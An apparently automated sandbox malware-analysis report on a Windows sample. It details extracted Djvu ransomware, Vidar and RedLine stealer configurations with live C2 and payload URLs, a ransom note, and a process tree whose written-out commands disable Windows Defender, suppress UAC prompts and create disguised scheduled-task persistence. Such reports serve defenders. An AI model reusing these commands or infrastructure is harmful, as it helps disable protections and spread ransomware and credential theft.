Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-10-2022 08:44

General

  • Target

    0101794c4248210be00cb7601be585015c9f78af80232958e70484e12e88f24f.exe

  • Size

    145KB

  • MD5

    21254653048e834b2c56627f35f77539

  • SHA1

    384165624c79c7750770771ff94d946a06e1e789

  • SHA256

    0101794c4248210be00cb7601be585015c9f78af80232958e70484e12e88f24f

  • SHA512

    03ac10a8c74f58c008ffc8fff8cd48b95624959f14e6e0bc2ec2dcc1c409009624fa667d06eacba5b03ca15db3fc7cc618d3c5b2463f46fb584073266de62008

  • SSDEEP

    3072:RZcO7/RPgDSUemsmtYFzP1jd5m+TXQOUJoqBTY:IO1gDSI5y5djd5XjQOUJn0

Malware Config

Extracted

Family

djvu

C2

http://winnlinne.com/lancer/get.php

Attributes
  • extension

    .ofww

  • offline_id

    xkNzhkB1wvgoDI7Uo0HPNLY3qCuwoFpP7nlhlut1

  • payload_url

    http://rgyui.top/dl/build2.exe

    http://winnlinne.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-EWKSsSJiVn Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0569Jhyjd

rsa_pubkey.plain

Extracted

Family

vidar

Version

54.7

Botnet

517

C2

https://t.me/trampapanam

https://nerdculture.de/@yoxhyp

Attributes
  • profile_id

    517

Extracted

Family

redline

Botnet

installi

C2

78.153.144.6:2510

Attributes
  • auth_value

    f7a95740dfddbaa1471d1ac4f63cb78e

Signatures

  • DcRat 4 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detected Djvu ransomware 8 IoCs
  • Detects Smokeloader packer 1 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • UAC bypass 3 TTPs 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Downloads MZ/PE file
  • Executes dropped EXE 10 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0101794c4248210be00cb7601be585015c9f78af80232958e70484e12e88f24f.exe
    "C:\Users\Admin\AppData\Local\Temp\0101794c4248210be00cb7601be585015c9f78af80232958e70484e12e88f24f.exe"
    1⤵
    • DcRat
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:4856
  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\C47D.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:392
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\C47D.dll
      2⤵
      • Loads dropped DLL
      PID:4496
  • C:\Users\Admin\AppData\Local\Temp\C605.exe
    C:\Users\Admin\AppData\Local\Temp\C605.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3388
    • C:\Users\Admin\AppData\Local\Temp\C605.exe
      C:\Users\Admin\AppData\Local\Temp\C605.exe
      2⤵
      • DcRat
      • Executes dropped EXE
      • Checks computer location settings
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:2580
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Users\Admin\AppData\Local\da1605b8-ee8d-4662-aa9d-fbf4b72991f6" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        3⤵
        • Modifies file permissions
        PID:2380
      • C:\Users\Admin\AppData\Local\Temp\C605.exe
        "C:\Users\Admin\AppData\Local\Temp\C605.exe" --Admin IsNotAutoStart IsNotTask
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4160
        • C:\Users\Admin\AppData\Local\Temp\C605.exe
          "C:\Users\Admin\AppData\Local\Temp\C605.exe" --Admin IsNotAutoStart IsNotTask
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          PID:1336
          • C:\Users\Admin\AppData\Local\cb421d28-a88f-4d99-92b1-21aa8cb52636\build2.exe
            "C:\Users\Admin\AppData\Local\cb421d28-a88f-4d99-92b1-21aa8cb52636\build2.exe"
            5⤵
            • Suspicious use of SetThreadContext
            PID:1984
            • C:\Users\Admin\AppData\Local\cb421d28-a88f-4d99-92b1-21aa8cb52636\build2.exe
              "C:\Users\Admin\AppData\Local\cb421d28-a88f-4d99-92b1-21aa8cb52636\build2.exe"
              6⤵
              • Loads dropped DLL
              • Checks processor information in registry
              PID:3228
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\cb421d28-a88f-4d99-92b1-21aa8cb52636\build2.exe" & del C:\PrograData\*.dll & exit
                7⤵
                  PID:3752
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im build2.exe /f
                    8⤵
                    • Kills process with taskkill
                    PID:2972
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 6
                    8⤵
                    • Delays execution with timeout.exe
                    PID:1232
            • C:\Users\Admin\AppData\Local\cb421d28-a88f-4d99-92b1-21aa8cb52636\build3.exe
              "C:\Users\Admin\AppData\Local\cb421d28-a88f-4d99-92b1-21aa8cb52636\build3.exe"
              5⤵
                PID:968
                • C:\Windows\SysWOW64\schtasks.exe
                  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                  6⤵
                  • DcRat
                  • Creates scheduled task(s)
                  PID:748
      • C:\Users\Admin\AppData\Local\Temp\C981.exe
        C:\Users\Admin\AppData\Local\Temp\C981.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:224
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          wmic os get Caption
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4512
        • C:\Windows\SysWOW64\cmd.exe
          cmd /C "wmic path win32_VideoController get name"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3420
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic path win32_VideoController get name
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3908
        • C:\Windows\SysWOW64\cmd.exe
          cmd /C "wmic cpu get name"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:776
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic cpu get name
            3⤵
              PID:4576
        • C:\Users\Admin\AppData\Local\Temp\D45F.exe
          C:\Users\Admin\AppData\Local\Temp\D45F.exe
          1⤵
          • Executes dropped EXE
          PID:4392
        • C:\Users\Admin\AppData\Local\Temp\D5D7.exe
          C:\Users\Admin\AppData\Local\Temp\D5D7.exe
          1⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4972
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3484
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Tqqcbghwdivfantidef.bat" "
            2⤵
              PID:4032
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
                3⤵
                  PID:3304
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t "REG_DWORD" /d 0 /f
                  3⤵
                  • UAC bypass
                  PID:532
                • C:\Windows\SysWOW64\reg.exe
                  reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                  3⤵
                    PID:3364
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                    3⤵
                      PID:3628
                    • C:\Windows\SysWOW64\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                      3⤵
                        PID:1928
                      • C:\Windows\SysWOW64\reg.exe
                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                        3⤵
                          PID:4960
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          PID:4020
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          PID:3444
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          PID:4528
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          PID:4512
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                          3⤵
                          • Modifies Windows Defender Real-time Protection settings
                          PID:3424
                        • C:\Windows\SysWOW64\reg.exe
                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                          3⤵
                            PID:376
                          • C:\Windows\SysWOW64\reg.exe
                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                            3⤵
                              PID:1800
                            • C:\Windows\SysWOW64\reg.exe
                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                              3⤵
                                PID:4652
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                3⤵
                                  PID:4612
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                  3⤵
                                    PID:4736
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                    3⤵
                                      PID:384
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                      3⤵
                                        PID:3112
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                        3⤵
                                          PID:1056
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                          3⤵
                                            PID:3908
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                            3⤵
                                              PID:1796
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                              3⤵
                                                PID:2108
                                              • C:\Windows\SysWOW64\reg.exe
                                                reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                3⤵
                                                  PID:3932
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                  3⤵
                                                    PID:5096
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                    3⤵
                                                      PID:4148
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                      3⤵
                                                        PID:1484
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                        3⤵
                                                          PID:4436
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                          3⤵
                                                            PID:4760
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                            3⤵
                                                              PID:2760
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                              3⤵
                                                                PID:1956
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                3⤵
                                                                  PID:4928
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                  3⤵
                                                                  • Modifies security service
                                                                  PID:3888
                                                              • C:\Users\Admin\AppData\Local\Temp\D5D7.exe
                                                                C:\Users\Admin\AppData\Local\Temp\D5D7.exe
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:3640
                                                              • C:\Users\Admin\AppData\Local\Temp\D5D7.exe
                                                                C:\Users\Admin\AppData\Local\Temp\D5D7.exe
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:2540
                                                            • C:\Windows\SysWOW64\explorer.exe
                                                              C:\Windows\SysWOW64\explorer.exe
                                                              1⤵
                                                              • Accesses Microsoft Outlook profiles
                                                              • outlook_office_path
                                                              • outlook_win_path
                                                              PID:3452
                                                            • C:\Windows\explorer.exe
                                                              C:\Windows\explorer.exe
                                                              1⤵
                                                                PID:3624
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:440
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                  2⤵
                                                                  • DcRat
                                                                  • Creates scheduled task(s)
                                                                  PID:4816

                                                              Network

                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                              Execution

                                                              Scheduled Task

                                                              1
                                                              T1053

                                                              Persistence

                                                              Modify Existing Service

                                                              2
                                                              T1031

                                                              Registry Run Keys / Startup Folder

                                                              1
                                                              T1060

                                                              Scheduled Task

                                                              1
                                                              T1053

                                                              Privilege Escalation

                                                              Bypass User Account Control

                                                              1
                                                              T1088

                                                              Scheduled Task

                                                              1
                                                              T1053

                                                              Defense Evasion

                                                              Modify Registry

                                                              4
                                                              T1112

                                                              Disabling Security Tools

                                                              2
                                                              T1089

                                                              Bypass User Account Control

                                                              1
                                                              T1088

                                                              File Permissions Modification

                                                              1
                                                              T1222

                                                              Credential Access

                                                              Credentials in Files

                                                              3
                                                              T1081

                                                              Discovery

                                                              Query Registry

                                                              4
                                                              T1012

                                                              System Information Discovery

                                                              4
                                                              T1082

                                                              Peripheral Device Discovery

                                                              1
                                                              T1120

                                                              Collection

                                                              Data from Local System

                                                              3
                                                              T1005

                                                              Email Collection

                                                              1
                                                              T1114

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • C:\ProgramData\mozglue.dll
                                                                Filesize

                                                                593KB

                                                                MD5

                                                                c8fd9be83bc728cc04beffafc2907fe9

                                                                SHA1

                                                                95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                SHA256

                                                                ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                SHA512

                                                                fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                              • C:\ProgramData\nss3.dll
                                                                Filesize

                                                                2.0MB

                                                                MD5

                                                                1cc453cdf74f31e4d913ff9c10acdde2

                                                                SHA1

                                                                6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                SHA256

                                                                ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                SHA512

                                                                dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\D5D7.exe.log
                                                                Filesize

                                                                1KB

                                                                MD5

                                                                e87e48b105757e1c7563d1c719059733

                                                                SHA1

                                                                28a3f2b2e0672da2b531f4757d2b20b53032dafc

                                                                SHA256

                                                                0aaf22dc84cc3fcfe53de7ccfed8e662247dfb7f1a9967032c88790d0c663461

                                                                SHA512

                                                                bf19c5743143aee914a453c41189c722c9b90a5b8bf299cecf3e1f97656d32cd209ecb74da8aebc89bb41c27d189f73aaaabbc64fe383410c95dc76ad4218968

                                                              • C:\Users\Admin\AppData\Local\Temp\C47D.dll
                                                                Filesize

                                                                1.9MB

                                                                MD5

                                                                67fdb82fdbc2b7c96197e1e7910221d5

                                                                SHA1

                                                                a04e893b5e681ec1dd4b4518704b1e8f4e3ea2d4

                                                                SHA256

                                                                8a914b14659e7c2346089fa7a6f43755d94cf89fd56de4c1a7f6aa60ab451a2e

                                                                SHA512

                                                                5ad03c8b6b9e242b84f85cc0a8637164d1a0aaa5dd1994a9f2d567de65beac2b19ba2533277eeb22c068122eb5fca45435799398fc0e3031384bffdeeb1078fc

                                                              • C:\Users\Admin\AppData\Local\Temp\C47D.dll
                                                                Filesize

                                                                1.9MB

                                                                MD5

                                                                67fdb82fdbc2b7c96197e1e7910221d5

                                                                SHA1

                                                                a04e893b5e681ec1dd4b4518704b1e8f4e3ea2d4

                                                                SHA256

                                                                8a914b14659e7c2346089fa7a6f43755d94cf89fd56de4c1a7f6aa60ab451a2e

                                                                SHA512

                                                                5ad03c8b6b9e242b84f85cc0a8637164d1a0aaa5dd1994a9f2d567de65beac2b19ba2533277eeb22c068122eb5fca45435799398fc0e3031384bffdeeb1078fc

                                                              • C:\Users\Admin\AppData\Local\Temp\C605.exe
                                                                Filesize

                                                                804KB

                                                                MD5

                                                                882a96452e0073218ab82ebc8844281b

                                                                SHA1

                                                                e36ad67193b1e3175290d68284eea511d5bb2a17

                                                                SHA256

                                                                398688e1e89e802326e6867bd0c3197f10de218371d70a61cff39dd9a80a8a60

                                                                SHA512

                                                                e5d798d6c2a4dd7207307fdd9133ae2fb5c758c37da7cdc35a435c2288141a847b04d3546cf1e965eeeca5849b8ac8bb3b7a58b56ece83d9ba1e3b3b9315f482

                                                              • C:\Users\Admin\AppData\Local\Temp\C605.exe
                                                                Filesize

                                                                804KB

                                                                MD5

                                                                882a96452e0073218ab82ebc8844281b

                                                                SHA1

                                                                e36ad67193b1e3175290d68284eea511d5bb2a17

                                                                SHA256

                                                                398688e1e89e802326e6867bd0c3197f10de218371d70a61cff39dd9a80a8a60

                                                                SHA512

                                                                e5d798d6c2a4dd7207307fdd9133ae2fb5c758c37da7cdc35a435c2288141a847b04d3546cf1e965eeeca5849b8ac8bb3b7a58b56ece83d9ba1e3b3b9315f482

                                                              • C:\Users\Admin\AppData\Local\Temp\C605.exe
                                                                Filesize

                                                                804KB

                                                                MD5

                                                                882a96452e0073218ab82ebc8844281b

                                                                SHA1

                                                                e36ad67193b1e3175290d68284eea511d5bb2a17

                                                                SHA256

                                                                398688e1e89e802326e6867bd0c3197f10de218371d70a61cff39dd9a80a8a60

                                                                SHA512

                                                                e5d798d6c2a4dd7207307fdd9133ae2fb5c758c37da7cdc35a435c2288141a847b04d3546cf1e965eeeca5849b8ac8bb3b7a58b56ece83d9ba1e3b3b9315f482

                                                              • C:\Users\Admin\AppData\Local\Temp\C605.exe
                                                                Filesize

                                                                804KB

                                                                MD5

                                                                882a96452e0073218ab82ebc8844281b

                                                                SHA1

                                                                e36ad67193b1e3175290d68284eea511d5bb2a17

                                                                SHA256

                                                                398688e1e89e802326e6867bd0c3197f10de218371d70a61cff39dd9a80a8a60

                                                                SHA512

                                                                e5d798d6c2a4dd7207307fdd9133ae2fb5c758c37da7cdc35a435c2288141a847b04d3546cf1e965eeeca5849b8ac8bb3b7a58b56ece83d9ba1e3b3b9315f482

                                                              • C:\Users\Admin\AppData\Local\Temp\C605.exe
                                                                Filesize

                                                                804KB

                                                                MD5

                                                                882a96452e0073218ab82ebc8844281b

                                                                SHA1

                                                                e36ad67193b1e3175290d68284eea511d5bb2a17

                                                                SHA256

                                                                398688e1e89e802326e6867bd0c3197f10de218371d70a61cff39dd9a80a8a60

                                                                SHA512

                                                                e5d798d6c2a4dd7207307fdd9133ae2fb5c758c37da7cdc35a435c2288141a847b04d3546cf1e965eeeca5849b8ac8bb3b7a58b56ece83d9ba1e3b3b9315f482

                                                              • C:\Users\Admin\AppData\Local\Temp\C981.exe
                                                                Filesize

                                                                4.3MB

                                                                MD5

                                                                2f3ab25b4bc37d6f7458b51ad51d4d91

                                                                SHA1

                                                                21e6d68e83303c5b385c70dce3dc467399263a27

                                                                SHA256

                                                                8320c73583b7638cffdf3ba722a6b3fc76b9e8531127a1141157b45b231e0eab

                                                                SHA512

                                                                df141ff59de2a6495b7f4ad6e64ab21514efd125576ff54563eed1c807a5027773672a286290e8a9b472f5227ef730bc41b78a18ae2637371ced094e76d5424b

                                                              • C:\Users\Admin\AppData\Local\Temp\C981.exe
                                                                Filesize

                                                                4.3MB

                                                                MD5

                                                                2f3ab25b4bc37d6f7458b51ad51d4d91

                                                                SHA1

                                                                21e6d68e83303c5b385c70dce3dc467399263a27

                                                                SHA256

                                                                8320c73583b7638cffdf3ba722a6b3fc76b9e8531127a1141157b45b231e0eab

                                                                SHA512

                                                                df141ff59de2a6495b7f4ad6e64ab21514efd125576ff54563eed1c807a5027773672a286290e8a9b472f5227ef730bc41b78a18ae2637371ced094e76d5424b

                                                              • C:\Users\Admin\AppData\Local\Temp\D45F.exe
                                                                Filesize

                                                                8.9MB

                                                                MD5

                                                                1a46061adcf713ccfa1769fd7ad89f37

                                                                SHA1

                                                                3d9a5074f4010250f8d27543190ae792fb3b7fcb

                                                                SHA256

                                                                ba9ed3944e8ec8bfa8140d6b737f7275a14041e54b8e635edc6f7b9d7b9d60b1

                                                                SHA512

                                                                5c20758cf5aac63bf575d49b963d9a0e4426026be869c31c2568184c2666752eb7dcb44f56e92f881083e655b6361b130dd3cff5a5bd7a998feaca1680ae2047

                                                              • C:\Users\Admin\AppData\Local\Temp\D45F.exe
                                                                Filesize

                                                                8.9MB

                                                                MD5

                                                                1a46061adcf713ccfa1769fd7ad89f37

                                                                SHA1

                                                                3d9a5074f4010250f8d27543190ae792fb3b7fcb

                                                                SHA256

                                                                ba9ed3944e8ec8bfa8140d6b737f7275a14041e54b8e635edc6f7b9d7b9d60b1

                                                                SHA512

                                                                5c20758cf5aac63bf575d49b963d9a0e4426026be869c31c2568184c2666752eb7dcb44f56e92f881083e655b6361b130dd3cff5a5bd7a998feaca1680ae2047

                                                              • C:\Users\Admin\AppData\Local\Temp\D5D7.exe
                                                                Filesize

                                                                7KB

                                                                MD5

                                                                74f18f5604cdfab09becca9a0828dc27

                                                                SHA1

                                                                1665e43d868eca4d263d560711f28c814ae8dc3f

                                                                SHA256

                                                                3bcb688020ab998320195b4acec37e146c2366fdaeefa86319278b3b57f4b58c

                                                                SHA512

                                                                374a37bb503a6d680f2471730f6e853c52461620f2d269dded5c85966cea53fba6402b594a82d5cc36b2c10b365e6f81dc1f0c8af3c300e450b6da8cee42912b

                                                              • C:\Users\Admin\AppData\Local\Temp\D5D7.exe
                                                                Filesize

                                                                7KB

                                                                MD5

                                                                74f18f5604cdfab09becca9a0828dc27

                                                                SHA1

                                                                1665e43d868eca4d263d560711f28c814ae8dc3f

                                                                SHA256

                                                                3bcb688020ab998320195b4acec37e146c2366fdaeefa86319278b3b57f4b58c

                                                                SHA512

                                                                374a37bb503a6d680f2471730f6e853c52461620f2d269dded5c85966cea53fba6402b594a82d5cc36b2c10b365e6f81dc1f0c8af3c300e450b6da8cee42912b

                                                              • C:\Users\Admin\AppData\Local\Temp\D5D7.exe
                                                                Filesize

                                                                7KB

                                                                MD5

                                                                74f18f5604cdfab09becca9a0828dc27

                                                                SHA1

                                                                1665e43d868eca4d263d560711f28c814ae8dc3f

                                                                SHA256

                                                                3bcb688020ab998320195b4acec37e146c2366fdaeefa86319278b3b57f4b58c

                                                                SHA512

                                                                374a37bb503a6d680f2471730f6e853c52461620f2d269dded5c85966cea53fba6402b594a82d5cc36b2c10b365e6f81dc1f0c8af3c300e450b6da8cee42912b

                                                              • C:\Users\Admin\AppData\Local\Temp\D5D7.exe
                                                                Filesize

                                                                7KB

                                                                MD5

                                                                74f18f5604cdfab09becca9a0828dc27

                                                                SHA1

                                                                1665e43d868eca4d263d560711f28c814ae8dc3f

                                                                SHA256

                                                                3bcb688020ab998320195b4acec37e146c2366fdaeefa86319278b3b57f4b58c

                                                                SHA512

                                                                374a37bb503a6d680f2471730f6e853c52461620f2d269dded5c85966cea53fba6402b594a82d5cc36b2c10b365e6f81dc1f0c8af3c300e450b6da8cee42912b

                                                              • C:\Users\Admin\AppData\Local\Temp\Tqqcbghwdivfantidef.bat
                                                                Filesize

                                                                4KB

                                                                MD5

                                                                248e51762a488609ddbf23e6a9f71ce4

                                                                SHA1

                                                                87a36b87bade46d0b0614b104152db7814808b21

                                                                SHA256

                                                                fc25f8a91c687d51e45cc7cddcab46a73032d8872407d8cb19041155e140a653

                                                                SHA512

                                                                76b7d51767cba0dec6c659270ff0bdbe29d2c66a7f4d6288bc884573452ba3f74ea6162d79ce4011df592bddafd0f42577af3c2acd2d5fb1b6826b9d09bfd0d0

                                                              • C:\Users\Admin\AppData\Local\da1605b8-ee8d-4662-aa9d-fbf4b72991f6\C605.exe
                                                                Filesize

                                                                804KB

                                                                MD5

